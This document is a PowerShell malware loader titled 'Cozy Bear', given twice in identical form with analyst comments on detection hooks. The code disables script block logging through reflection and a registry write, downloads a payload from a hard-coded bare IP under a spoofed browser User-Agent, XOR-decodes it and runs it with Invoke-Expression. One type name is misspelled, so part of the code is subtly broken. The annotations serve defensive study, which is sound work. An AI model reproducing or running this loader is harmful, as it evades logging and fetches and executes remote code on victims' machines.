PowerShell Cozy Bear
#Code By E1.Coders
# Analyst annotation (defensive review). This is a PowerShell downloader/loader whose
# observable behaviour, in order, is: (1) an attempt to switch off script block logging for
# the running process via reflection on the engine's cached Group Policy table, plus a
# registry write under the PowerShell policy key; (2) a download from a hard-coded IP with a
# browser-like User-Agent, staged in %TEMP%; (3) single-byte XOR decoding of the file,
# UTF-8 decoding of the result, and execution of that text with Invoke-Expression.
# Detection hooks visible in these lines: 4104 script block content referencing
# cachedGroupPolicySettings / GetFieldValue; Set-ItemProperty under
# HKLM:\Software\Policies\Microsoft\Windows\PowerShell from a PowerShell host;
# Invoke-WebRequest to a bare IP followed by a file create in %TEMP%; Invoke-Expression
# fed by runtime-decoded bytes.
if ($PSVersionTable.PSVersion.Major -ge 3) {
# Everything below is gated on PowerShell 3 or newer.
$utils = [System.Management.Automation.Utils]
# Reflection read of the engine's private cached Group Policy settings. Overwriting the
# cached copy is evidently intended to disable logging for this process without changing
# GPO; a script that reads this field at all is itself a high-fidelity indicator.
$cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
if ($cachedGroupPolicySettings) {
if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
# Both script block logging policy values are forced to 0 (disabled) in the cached table.
$cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
$cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
}
# Persistent policy tampering in HKLM (normally needs elevated rights). The value written is
# whatever the cached table held — $null if the key above was absent. Alert on any write to
# this path originating from a PowerShell process.
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
}
# Browser User-Agent string so the fetch blends with ordinary web traffic in proxy logs.
$userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
# Plain-HTTP download from a hard-coded bare IP (no hostname) — a candidate for egress
# blocking and for alerting on PowerShell-initiated HTTP to raw IPs.
$payloadUrl = "http://46.246.38.234/malware.exe"
# Staged on disk in the user's TEMP directory before decoding, so file-create telemetry
# (Sysmon event 11 or equivalent) sees the encoded artifact.
$payloadPath = "$env:TEMP\malware.exe"
Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent
# Single-byte XOR with key 0x42: trivial obfuscation aimed at static signatures on the
# downloaded file. The decoded form only ever exists in memory.
$key = 0x42
$payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
$decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
# Despite the .exe filename the decoded bytes are treated as UTF-8 script text and run via
# Invoke-Expression, not launched as a binary — so the real payload is a second-stage script.
$decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
Invoke-Expression $decryptedPayload
} else {
# Fallback message for hosts below PowerShell 3; no other action is taken on that path.
Write-Host "PowerShell version 3 or later is required to run this script."
}
#Code By E1.Coders
# Analyst annotation (defensive review). This block is a verbatim repeat of the script
# that precedes it on the page; the same observations apply. Behaviour, in order:
# (1) an attempt to switch off script block logging for the running process via
# reflection on the engine's cached Group Policy table, plus a registry write under the
# PowerShell policy key; (2) a download from a hard-coded IP with a browser-like
# User-Agent, staged in %TEMP%; (3) single-byte XOR decoding, UTF-8 decoding, and
# execution of the resulting text with Invoke-Expression.
# Detection hooks visible in these lines: 4104 script block content referencing
# cachedGroupPolicySettings / GetFieldValue; Set-ItemProperty under
# HKLM:\Software\Policies\Microsoft\Windows\PowerShell from a PowerShell host;
# Invoke-WebRequest to a bare IP followed by a file create in %TEMP%; Invoke-Expression
# fed by runtime-decoded bytes.
if ($PSVersionTable.PSVersion.Major -ge 3) {
# Everything below is gated on PowerShell 3 or newer.
$utils = [System.Management.Automation.Utils]
# Reflection read of the engine's private cached Group Policy settings. Overwriting the
# cached copy is evidently intended to disable logging for this process without changing
# GPO; a script that reads this field at all is itself a high-fidelity indicator.
$cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
if ($cachedGroupPolicySettings) {
if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
# Both script block logging policy values are forced to 0 (disabled) in the cached table.
$cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
$cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
}
# Persistent policy tampering in HKLM (normally needs elevated rights). The value written is
# whatever the cached table held — $null if the key above was absent. Alert on any write to
# this path originating from a PowerShell process.
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
}
# Browser User-Agent string so the fetch blends with ordinary web traffic in proxy logs.
$userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
# Plain-HTTP download from a hard-coded bare IP (no hostname) — a candidate for egress
# blocking and for alerting on PowerShell-initiated HTTP to raw IPs.
$payloadUrl = "http://46.246.38.234/malware.exe"
# Staged on disk in the user's TEMP directory before decoding, so file-create telemetry
# (Sysmon event 11 or equivalent) sees the encoded artifact.
$payloadPath = "$env:TEMP\malware.exe"
Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent
# Single-byte XOR with key 0x42: trivial obfuscation aimed at static signatures on the
# downloaded file. The decoded form only ever exists in memory.
$key = 0x42
$payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
$decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
# Despite the .exe filename the decoded bytes are treated as UTF-8 script text and run via
# Invoke-Expression, not launched as a binary — so the real payload is a second-stage script.
$decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
Invoke-Expression $decryptedPayload
} else {
# Fallback message for hosts below PowerShell 3; no other action is taken on that path.
Write-Host "PowerShell version 3 or later is required to run this script."
}